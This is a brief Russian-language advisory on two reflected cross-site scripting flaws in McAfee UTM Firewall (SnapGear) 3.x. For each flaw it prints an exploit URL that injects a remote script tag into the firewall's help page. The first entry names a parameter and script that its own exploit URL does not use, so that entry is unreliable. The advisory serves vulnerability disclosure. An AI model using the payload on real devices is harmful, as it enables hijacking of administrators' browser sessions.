Программа: McAfee Unified Threat Management (UTM) Firewall (SnapGear) 3.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "profileCommentTextArea" сценарием members/profileCommentsResponse.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "page" сценарием cgi-bin/cgix/help. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

http://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>



Оставить мнение